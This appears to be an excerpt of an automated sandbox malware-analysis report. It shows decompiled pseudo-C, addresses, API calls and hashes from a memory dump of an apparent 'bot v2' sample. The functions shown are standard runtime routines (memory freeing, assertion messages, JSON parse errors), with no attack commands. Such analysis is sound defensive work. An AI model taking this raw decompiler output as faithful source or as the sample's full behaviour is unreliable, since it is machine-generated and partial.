0x0041d11a
0x0041d12e
0x0041d13c
0x0041d146
0x0041d151
0x0041d168
0x0041d175
0x0041d180
0x0041d190
0x0041d1b4
0x0041d1c1
0x0041d1cc
0x0041d1dc
0x0041d0ce
0x0041d0ce
0x0041d0d1
0x0041d0d7
0x0041d0d7
0x0041d1e7
0x0041d1ea
0x0041d1ed
0x0041d211
0x0041d213
0x0041d215
0x0041d224
0x0041d229
0x0041d229
0x0041d241
0x0041d24d
0x0041d265
0x0041d26b
0x0041d280
0x0041d282
0x0041d284
0x0041d293
0x0041d298
0x0041d2a3
0x0041d2ae
0x0041d2c2
0x0041d2d6
0x0041d2e4
0x0041d2ee
0x0041d2f9
0x0041d310
0x0041d31d
0x0041d328
0x0041d338
0x0041d35c
0x0041d369
0x0041d373
0x0041d37e
0x0041d38c
0x0041d397
0x0041d3ab
0x0041d3bf
0x0041d3cd
0x0041d3d7
0x0041d3e2
0x0041d3e2
0x0041cffb
0x0041d003
0x0041d00e
0x0041d01e
0x0041d01e
0x0041e219

APIs

std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 0041D15F

Strings

": , xrefs: 0041D188, 0041D330
i != val.m_value.object->cend(), xrefs: 0041D21F, 0041D541
std::next(i) == val.m_value.object->cend(), xrefs: 0041D28E, 0041D5B0
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0041D21A, 0041D289, 0041D53C, 0041D5AB

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Mutex_baseMutex_base::~_std::_
String ID: ": $C:\Users\root\Desktop\bot v2\json.hpp$i != val.m_value.object->cend()$std::next(i) == val.m_value.object->cend()
API String ID: 3966282785-611405605
Opcode ID: 87bdb149cc5322ec2469ec2dea280ecb8df82aae9b52d4a562f4e9f9bdda872a
Instruction ID: 58d3eddc5c4989953db7c38a934e16fefe8bea5ad19dfe25bef33080d8027f39
Opcode Fuzzy Hash: 87bdb149cc5322ec2469ec2dea280ecb8df82aae9b52d4a562f4e9f9bdda872a
Instruction Fuzzy Hash: 0C22D974A00218DFCB18DF95CD91AEEB7B1BF48304F1041AAE51AAB391DB746E81CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00437A26 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A26(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x4c6208) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00432BD6(_t46);
							E00437603( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00432BD6(_t47);
							E00437701( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00432BD6( *((intOrPtr*)(_t74 + 0x7c)));
						E00432BD6( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00432BD6( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00432BD6( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00432BD6( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00432BD6( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00437B97( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4c6328) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00432BD6(_t31);
							E00432BD6( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00432BD6(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00432BD6(_t74);
			}

0x00437a2e
0x00437a32
0x00437a3a
0x00437a43
0x00437a48
0x00437a4f
0x00437a57
0x00437a5f
0x00437a6a
0x00437a70
0x00437a71
0x00437a79
0x00437a81
0x00437a8c
0x00437a92
0x00437a96
0x00437aa1
0x00437aa7
0x00437a48
0x00437aa8
0x00437ab0
0x00437ac3
0x00437ad6
0x00437ae4
0x00437aef
0x00437af4
0x00437afd
0x00437b05
0x00437b06
0x00437b0c
0x00437b0f
0x00437b12
0x00437b19
0x00437b1b
0x00437b1f
0x00437b27
0x00437b2e
0x00437b34
0x00437b35
0x00437b35
0x00437b3c
0x00437b3e
0x00437b43
0x00437b4b
0x00437b50
0x00437b51
0x00437b51
0x00437b54
0x00437b57
0x00437b5a
0x00437b5d
0x00437b5d
0x00437b6d

APIs

___free_lconv_mon.LIBCMT ref: 00437A6A

Part of subcall function 00437603: _free.LIBCMT ref: 00437620
Part of subcall function 00437603: _free.LIBCMT ref: 00437632
Part of subcall function 00437603: _free.LIBCMT ref: 00437644
Part of subcall function 00437603: _free.LIBCMT ref: 00437656
Part of subcall function 00437603: _free.LIBCMT ref: 00437668
Part of subcall function 00437603: _free.LIBCMT ref: 0043767A
Part of subcall function 00437603: _free.LIBCMT ref: 0043768C
Part of subcall function 00437603: _free.LIBCMT ref: 0043769E
Part of subcall function 00437603: _free.LIBCMT ref: 004376B0
Part of subcall function 00437603: _free.LIBCMT ref: 004376C2
Part of subcall function 00437603: _free.LIBCMT ref: 004376D4
Part of subcall function 00437603: _free.LIBCMT ref: 004376E6
Part of subcall function 00437603: _free.LIBCMT ref: 004376F8

_free.LIBCMT ref: 00437A5F

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

_free.LIBCMT ref: 00437A81
_free.LIBCMT ref: 00437A96
_free.LIBCMT ref: 00437AA1
_free.LIBCMT ref: 00437AC3
_free.LIBCMT ref: 00437AD6
_free.LIBCMT ref: 00437AE4
_free.LIBCMT ref: 00437AEF
_free.LIBCMT ref: 00437B27
_free.LIBCMT ref: 00437B2E
_free.LIBCMT ref: 00437B4B
_free.LIBCMT ref: 00437B63

Strings

(cL, xrefs: 00437B12

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: (cL
API String ID: 161543041-4171627413
Opcode ID: 45a091c3db8e8a16de82278b3ca900e670e711996fb4962d95ce8125e1ad20c0
Instruction ID: 04ccc1a98c6762022911b02c7515981bd10acbe12963fc3a7ddf50ac2e920743
Opcode Fuzzy Hash: 45a091c3db8e8a16de82278b3ca900e670e711996fb4962d95ce8125e1ad20c0
Instruction Fuzzy Hash: 3A313E716082059BEB31BE79D945B9BB3E9BF08354F10681FE094D7291DBB8B9808718

Uniqueness

Uniqueness Score: -1.00%

Function 00430721 Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 403
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00430721(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v576;
				intOrPtr* _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* __ebp;
				signed int _t93;
				void* _t97;
				void* _t101;
				signed int _t102;
				void* _t119;
				void* _t121;
				void* _t122;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t145;
				void* _t146;
				void* _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t160;
				void* _t161;
				signed int _t162;
				WCHAR* _t164;
				char* _t165;
				char* _t166;
				char* _t169;
				char* _t170;
				void* _t173;
				void* _t174;
				char* _t176;
				char* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t186;
				void* _t188;
				void* _t193;
				signed int _t194;
				WCHAR* _t197;
				intOrPtr* _t198;
				signed int _t200;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t207;
				void* _t211;
				void* _t215;
				intOrPtr* _t216;
				void* _t218;
				signed int _t219;
				char _t221;
				void* _t222;
				signed short* _t224;
				intOrPtr* _t226;
				void* _t227;
				signed int _t228;
				void* _t229;
				void* _t231;
				void* _t232;
				void* _t233;
				void* _t236;

				_t214 = __edx;
				_t93 =  *0x4c61a4; // 0x8656a166
				_v8 = _t93 ^ _t228;
				_push(__ebx);
				_t190 = _a24;
				_push(__esi);
				_t226 = _a4;
				_push(__edi);
				_t221 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t97 = E00435C21(_t226, _t221, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t232 = _t231 + 0xc;
				if(_t97 != 0) {
					L65:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004292BC();
					asm("int3");
					_push(_t228);
					_t229 = _t232;
					_push(_t197);
					_push(_t197);
					E00430CAE(_t190, _t221, _t226, _v584, _v580, _v576);
					_t101 = E0043359E(2);
					_t233 = _t232 + 0x10;
					_t102 =  *(_t101 + 0xc);
					__eflags = _t102 & 0x000004c0;
					if((_t102 & 0x000004c0) == 0) {
						_push(0);
						_push(4);
						_t119 = E0043359E(2);
						_t197 = 0;
						_push(_t119);
						E004360CE(_t190, _t221, _t226);
						_t233 = _t233 + 0x10;
					}
					_push(0);
					_v12 = E00430D5D();
					_v16 = E0043359E(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					_push( &_v12);
					_push( &_v16);
					L69();
					E00433ABB(_t190, _t197, _t221, _t226, E0043359E(2));
					E0042972B(_t190, _t197, _t214, _t221, _t226);
					asm("int3");
					_push(_t229);
					_push( *_v580);
					_push( *_v584);
					return E00430DFF( *_v596,  *_v592,  *_v588);
				} else {
					_t121 = E00435BAC(_t226, _t221, L"\n\n");
					_t232 = _t232 + 0xc;
					if(_t121 != 0) {
						goto L65;
					} else {
						_t122 = E00435BAC(_t226, _t221, L"Program: ");
						_t232 = _t232 + 0xc;
						if(_t122 != 0) {
							goto L65;
						} else {
							E00427330(_t221,  &_v532, _t122, 0x20a);
							_t236 = _t232 + 0xc;
							_v548 = 0;
							_t126 =  &_v548;
							__imp__GetModuleHandleExW(6, _t190, _t126);
							_t197 =  &_v532;
							_t190 = 0x105;
							asm("sbb eax, eax");
							_t128 =  ~_t126 & _v548;
							_v548 = _t128;
							if(GetModuleFileNameW(_t128, _t197, 0x105) != 0) {
								L5:
								_t190 =  &_v532;
								_t198 =  &_v532;
								_t214 = _t198 + 2;
								do {
									_t130 =  *_t198;
									_t198 = _t198 + 2;
								} while (_t130 != _v540);
								_t197 = _t198 - _t214 >> 1;
								if( &(_t197[5]) <= 0x40) {
									L9:
									_t132 = E00435BAC(_t226, _t221, _t190);
									_t232 = _t236 + 0xc;
									if(_t132 != 0) {
										goto L65;
									} else {
										_t133 = E00435BAC(_t226, _t221, "\n");
										_t232 = _t232 + 0xc;
										if(_t133 != 0) {
											goto L65;
										} else {
											_t134 = E00435BAC(_t226, _t221, L"File: ");
											_t232 = _t232 + 0xc;
											if(_t134 != 0) {
												goto L65;
											} else {
												_t214 = _v536;
												_t200 = _t214;
												_t190 = _t200 + 2;
												do {
													_t135 =  *_t200;
													_t200 = _t200 + 2;
												} while (_t135 != _v540);
												_t197 = _t200 - _t190 >> 1;
												if( &(_t197[4]) <= 0x40) {
													_push(_t214);
													goto L34;
												} else {
													_t194 = _t214;
													_t211 = _t194 + 2;
													do {
														_t161 =  *_t194;
														_t194 = _t194 + 2;
													} while (_t161 != _v540);
													_v544 = 0x5c;
													_t190 = _t194 - _t211 >> 1;
													_t197 = 1;
													_t162 =  *(_t214 + _t190 * 2 - 2) & 0x0000ffff;
													if(_t162 != _v544) {
														_v556 = _t162;
														_t224 = _t214 - 2 + _t190 * 2;
														_t219 = _t162;
														while(_t219 != 0x2f && _t197 < _t190) {
															_t224 = _t224 - 2;
															_t197 =  &(_t197[0]);
															_t184 =  *_t224 & 0x0000ffff;
															_t219 = _t184;
															if(_t184 != _v544) {
																continue;
															}
															break;
														}
														_t221 = _a8;
														_t214 = _v536;
													}
													_t164 = _t190 - _t197;
													_v544 = _t164;
													if(_t164 <= 0x26) {
														L29:
														if(__eflags >= 0) {
															_push(0x23);
															_t165 = E00435D6C(_t197, _t226, _t221, _t214);
															_t232 = _t232 + 0x10;
															__eflags = _t165;
															if(_t165 != 0) {
																goto L65;
															} else {
																_t166 = E00435BAC(_t226, _t221, L"...");
																_t232 = _t232 + 0xc;
																__eflags = _t166;
																if(_t166 != 0) {
																	goto L65;
																} else {
																	_t197 = _v544;
																	_push(8);
																	_t169 = E00435D6C(_t197, _t226, _t221, _v536 + _t197 * 2);
																	_t232 = _t232 + 0x10;
																	__eflags = _t169;
																	if(_t169 != 0) {
																		goto L65;
																	} else {
																		_t170 = E00435BAC(_t226, _t221, L"...");
																		_t232 = _t232 + 0xc;
																		__eflags = _t170;
																		if(_t170 != 0) {
																			goto L65;
																		} else {
																			_t173 = _v536 + _t190 * 2 + 0xfffffff2;
																			goto L33;
																		}
																	}
																}
															}
														} else {
															_t174 = 0x35;
															_t197 = _t197 >> 1;
															_v556 = _t197;
															_push(_t174 - _t197);
															_t176 = E00435D6C(_t197, _t226, _t221, _t214);
															_t232 = _t232 + 0x10;
															__eflags = _t176;
															if(_t176 != 0) {
																goto L65;
															} else {
																_t177 = E00435BAC(_t226, _t221, L"...");
																_t232 = _t232 + 0xc;
																__eflags = _t177;
																if(_t177 != 0) {
																	goto L65;
																} else {
																	_t190 = _t190 - _v556;
																	__eflags = _t190;
																	_t173 = _v536 + _t190 * 2;
																	goto L33;
																}
															}
														}
													} else {
														if(_t197 >= 0x12) {
															__eflags = _t164 - 0x26;
															goto L29;
														} else {
															_t179 = 0x35;
															_push(_t179 - _t197);
															_t181 = E00435D6C(_t197, _t226, _t221, _t214);
															_t232 = _t232 + 0x10;
															if(_t181 != 0) {
																goto L65;
															} else {
																_t182 = E00435BAC(_t226, _t221, L"...");
																_t232 = _t232 + 0xc;
																if(_t182 != 0) {
																	goto L65;
																} else {
																	_t197 = _v544;
																	_t173 = _v536 + _t197 * 2;
																	L33:
																	_push(_t173);
																	L34:
																	_push(_t221);
																	_push(_t226);
																	_t137 = E00435BAC();
																	_t232 = _t232 + 0xc;
																	if(_t137 != 0) {
																		goto L65;
																	} else {
																		_t138 = E00435BAC(_t226, _t221, "\n");
																		_t232 = _t232 + 0xc;
																		if(_t138 != 0) {
																			goto L65;
																		} else {
																			_t139 = E00435BAC(_t226, _t221, L"Line: ");
																			_t232 = _t232 + 0xc;
																			if(_t139 != 0) {
																				goto L65;
																			} else {
																				_t202 = _t226;
																				_t53 = _t202 + 2; // 0x44b7
																				_t215 = _t53;
																				do {
																					_t140 =  *_t202;
																					_t202 = _t202 + 2;
																				} while (_t140 != 0);
																				_t216 = _t226;
																				_t197 = _t202 - _t215 >> 1;
																				_t54 = _t216 + 2; // 0x44b7
																				_t190 = _t54;
																				do {
																					_t141 =  *_t216;
																					_t216 = _t216 + 2;
																				} while (_t141 != _v540);
																				_t214 = _t216 - _t190 >> 1;
																				_t145 = E00435B3A(_t197, _a20, _t226 + (_t216 - _t190 >> 1) * 2, _t221 - _t197, 0xa);
																				_t232 = _t232 + 0x10;
																				if(_t145 != 0) {
																					goto L65;
																				} else {
																					_t146 = E00435BAC(_t226, _t221, L"\n\n");
																					_t232 = _t232 + 0xc;
																					if(_t146 != 0) {
																						goto L65;
																					} else {
																						_t147 = E00435BAC(_t226, _t221, L"Expression: ");
																						_t232 = _t232 + 0xc;
																						if(_t147 != 0) {
																							goto L65;
																						} else {
																							_t204 = _t226;
																							_t59 = _t204 + 2; // 0x44b7
																							_t218 = _t59;
																							do {
																								_t148 =  *_t204;
																								_t204 = _t204 + 2;
																							} while (_t148 != 0);
																							_t60 = (_t204 - _t218 >> 1) + 0xb0; // 0x4563
																							_t214 = _t60;
																							_t207 = _v552;
																							_t190 = _t207 + 2;
																							do {
																								_t149 =  *_t207;
																								_t207 = _t207 + 2;
																							} while (_t149 != _v540);
																							_t197 = _t207 - _t190 >> 1;
																							if(_t197 + _t214 <= _t221) {
																								_push(_v552);
																								goto L51;
																							} else {
																								_push(_t221 - _t214 - 3);
																								_t160 = E00435D6C(_t197, _t226, _t221, _v552);
																								_t232 = _t232 + 0x10;
																								if(_t160 != 0) {
																									goto L65;
																								} else {
																									_push(L"...");
																									L51:
																									_push(_t221);
																									_push(_t226);
																									_t151 = E00435BAC();
																									_t232 = _t232 + 0xc;
																									if(_t151 != 0) {
																										goto L65;
																									} else {
																										_t190 = L"\n\n";
																										_t152 = E00435BAC(_t226, _t221, L"\n\n");
																										_t232 = _t232 + 0xc;
																										if(_t152 != 0) {
																											goto L65;
																										} else {
																											_t153 = E00435BAC(_t226, _t221, L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_t232 = _t232 + 0xc;
																											if(_t153 != 0) {
																												goto L65;
																											} else {
																												_t154 = E00435BAC(_t226, _t221, L"\n\n");
																												_t232 = _t232 + 0xc;
																												if(_t154 != 0) {
																													goto L65;
																												} else {
																													_t155 = E00435BAC(_t226, _t221, L"(Press Retry to debug the application - JIT must be enabled)");
																													_t232 = _t232 + 0xc;
																													if(_t155 != 0) {
																														goto L65;
																													} else {
																														_pop(_t222);
																														_pop(_t227);
																														_pop(_t193);
																														return E00424900(_t155, _t193, _v8 ^ _t228, _t214, _t222, _t227);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t185 = _t197 * 2 - 0x6a;
									_t197 = 0x20a - _t185;
									_t190 =  &_v532 + _t185;
									_t186 = E0042CA37( &_v532 + _t185, _t197, L"...", 6);
									_t232 = _t236 + 0x10;
									if(_t186 != 0) {
										goto L65;
									} else {
										goto L9;
									}
								}
							} else {
								_t188 = E00435C21( &_v532, 0x105, L"<program name unknown>");
								_t232 = _t236 + 0xc;
								if(_t188 != 0) {
									goto L65;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}

0x00430721
0x0043072c
0x00430733
0x00430739
0x0043073a
0x0043073d
0x0043073e
0x00430741
0x00430742
0x0043074a
0x00430755
0x0043075b
0x00430760
0x00430767
0x0043076c
0x00430bf5
0x00430bf7
0x00430bf8
0x00430bf9
0x00430bfa
0x00430bfb
0x00430bfc
0x00430c01
0x00430c04
0x00430c05
0x00430c07
0x00430c08
0x00430c12
0x00430c19
0x00430c1e
0x00430c21
0x00430c25
0x00430c2a
0x00430c2c
0x00430c2e
0x00430c34
0x00430c39
0x00430c3a
0x00430c3b
0x00430c40
0x00430c40
0x00430c43
0x00430c4c
0x00430c54
0x00430c5a
0x00430c5e
0x00430c62
0x00430c66
0x00430c6a
0x00430c6b
0x00430c78
0x00430c80
0x00430c85
0x00430c88
0x00430c8e
0x00430c93
0x00430cad
0x00430772
0x00430779
0x0043077e
0x00430783
0x00000000
0x00430789
0x00430790
0x00430795
0x0043079a
0x00000000
0x004307a0
0x004307ad
0x004307b2
0x004307b7
0x004307bd
0x004307c7
0x004307cf
0x004307d5
0x004307db
0x004307dd
0x004307e5
0x004307f3
0x00430812
0x00430812
0x00430818
0x0043081a
0x0043081d
0x0043081d
0x00430820
0x00430823
0x0043082e
0x00430836
0x00430867
0x0043086a
0x0043086f
0x00430874
0x00000000
0x0043087a
0x00430881
0x00430886
0x0043088b
0x00000000
0x00430891
0x00430898
0x0043089d
0x004308a2
0x00000000
0x004308a8
0x004308a8
0x004308ae
0x004308b0
0x004308b3
0x004308b3
0x004308b6
0x004308b9
0x004308c4
0x004308cc
0x00430bd5
0x00000000
0x004308d2
0x004308d2
0x004308d4
0x004308d7
0x004308d7
0x004308da
0x004308dd
0x004308e8
0x004308f2
0x004308f6
0x004308f7
0x00430903
0x00430908
0x0043090e
0x00430911
0x00430913
0x0043091d
0x00430920
0x00430921
0x00430924
0x0043092d
0x00000000
0x00000000
0x00000000
0x0043092d
0x0043092f
0x00430932
0x00430932
0x0043093a
0x0043093c
0x00430945
0x00430990
0x00430990
0x00430b6d
0x00430b72
0x00430b77
0x00430b7a
0x00430b7c
0x00000000
0x00430b7e
0x00430b85
0x00430b8a
0x00430b8d
0x00430b8f
0x00000000
0x00430b91
0x00430b91
0x00430b9d
0x00430ba5
0x00430baa
0x00430bad
0x00430baf
0x00000000
0x00430bb1
0x00430bb8
0x00430bbd
0x00430bc0
0x00430bc2
0x00000000
0x00430bc4
0x00430bcd
0x00000000
0x00430bcd
0x00430bc2
0x00430baf
0x00430b8f
0x00430996
0x00430998
0x00430999
0x0043099d
0x004309a3
0x004309a7
0x004309ac
0x004309af
0x004309b1
0x00000000
0x004309b7
0x004309be
0x004309c3
0x004309c6
0x004309c8
0x00000000
0x004309ce
0x004309ce
0x004309ce
0x004309da
0x00000000
0x004309da
0x004309c8
0x004309b1
0x00430947
0x0043094a
0x0043098d
0x00000000
0x0043094c
0x0043094e
0x00430951
0x00430955
0x0043095a
0x0043095f
0x00000000
0x00430965
0x0043096c
0x00430971
0x00430976
0x00000000
0x0043097c
0x00430982
0x00430988
0x004309dd
0x004309dd
0x004309de
0x004309de
0x004309df
0x004309e0
0x004309e5
0x004309ea
0x00000000
0x004309f0
0x004309f7
0x004309fc
0x00430a01
0x00000000
0x00430a07
0x00430a0e
0x00430a13
0x00430a18
0x00000000
0x00430a1e
0x00430a1e
0x00430a22
0x00430a22
0x00430a25
0x00430a25
0x00430a28
0x00430a2b
0x00430a32
0x00430a34
0x00430a36
0x00430a36
0x00430a39
0x00430a39
0x00430a3c
0x00430a3f
0x00430a4c
0x00430a5a
0x00430a5f
0x00430a64
0x00000000
0x00430a6a
0x00430a71
0x00430a76
0x00430a7b
0x00000000
0x00430a81
0x00430a88
0x00430a8d
0x00430a92
0x00000000
0x00430a98
0x00430a98
0x00430a9c
0x00430a9c
0x00430a9f
0x00430a9f
0x00430aa2
0x00430aa5
0x00430aae
0x00430aae
0x00430ab4
0x00430aba
0x00430abd
0x00430abd
0x00430ac0
0x00430ac3
0x00430ace
0x00430ad5
0x00430bdb
0x00000000
0x00430adb
0x00430ae2
0x00430aeb
0x00430af0
0x00430af5
0x00000000
0x00430afb
0x00430afb
0x00430b00
0x00430b00
0x00430b01
0x00430b02
0x00430b07
0x00430b0c
0x00000000
0x00430b12
0x00430b12
0x00430b1a
0x00430b1f
0x00430b24
0x00000000
0x00430b2a
0x00430b31
0x00430b36
0x00430b3b
0x00000000
0x00430b41
0x00430b44
0x00430b49
0x00430b4e
0x00000000
0x00430b54
0x00430b5b
0x00430b60
0x00430b65
0x00000000
0x00430b6b
0x00430be9
0x00430bea
0x00430bed
0x00430bf4
0x00430bf4
0x00430b65
0x00430b4e
0x00430b3b
0x00430b24
0x00430b0c
0x00430af5
0x00430ad5
0x00430a92
0x00430a7b
0x00430a64
0x00430a18
0x00430a01
0x004309ea
0x00430976
0x0043095f
0x0043094a
0x00430945
0x004308cc
0x004308a2
0x0043088b
0x00430838
0x00430838
0x0043084b
0x00430853
0x00430857
0x0043085c
0x00430861
0x00000000
0x00000000
0x00000000
0x00000000
0x00430861
0x004307f5
0x00430802
0x00430807
0x0043080c
0x00000000
0x00000000
0x00000000
0x00000000
0x0043080c
0x004307f3
0x0043079a
0x00430783

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004307C7
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004307EB

Strings

\, xrefs: 004308E8
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 00430B2A
..., xrefs: 00430846, 00430965, 004309B7, 00430AFB, 00430B7E, 00430BB1
Assertion failed!, xrefs: 00430745
(Press Retry to debug the application - JIT must be enabled), xrefs: 00430B54
File: , xrefs: 00430891
<program name unknown>, xrefs: 004307F5
Expression: , xrefs: 00430A81
Program: , xrefs: 00430789
Line: , xrefs: 00430A07
@MD, xrefs: 00430B12

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$@MD$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-1457290199
Opcode ID: d6e13ded5d4cd08a4e051d9da36b3ff275d0a8a89063de4b8a6c3ebf94d6f353
Instruction ID: 43442a936aaa7734526b3b9e9d5a0cd5d83d5e3293f56a71a34330827ecccc7a
Opcode Fuzzy Hash: d6e13ded5d4cd08a4e051d9da36b3ff275d0a8a89063de4b8a6c3ebf94d6f353
Instruction Fuzzy Hash: 3BC14C70A4020966EB206A658C9AFAFB368DFAD708F04156FFD04D2241FA3CEE45C59D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C460 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C460(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				signed int _t43;
				signed int _t106;

				_t116 = __eflags;
				_t43 =  *0x4c61a4; // 0x8656a166
				_v8 = _t43 ^ _t106;
				_v236 = E0040CC10( &_v224);
				_v228 = E00421DC0(__ebx, __edi, __esi, __eflags,  &_v200, _a12);
				E00415310( &_v32, _t116, "parse_error");
				_v232 = E00406240(_t116,  &_v152, E00421390(__ebx, __edi, __esi, _t116,  &_v176,  &_v32, _a8), "parse error");
				_v240 = E00406240(_t116,  &_v104, E004061F0( &_v128,  &_v128, _v232, _v228), 0x44090c);
				E00406210( &_v56, E004061F0(_v236,  &_v80, _v240, _v236), _a16);
				E00416980( &_v80);
				E00416980( &_v104);
				E00416980( &_v128);
				E00416980( &_v152);
				E00416980( &_v176);
				E00416980( &_v32);
				E00416980( &_v200);
				E00416980( &_v224);
				_v248 =  *_a12;
				_v244 = E0041AF80( &_v56);
				E00416600(_a4, _a8, _v248, _v244);
				E00416980( &_v56);
				return E00424900(_a4, __ebx, _v8 ^ _t106, _v248, __edi, __esi, _a20);
			}

0x0040c460
0x0040c469
0x0040c470
0x0040c486
0x0040c49f
0x0040c4ad
0x0040c4de
0x0040c510
0x0040c539
0x0040c544
0x0040c54c
0x0040c554
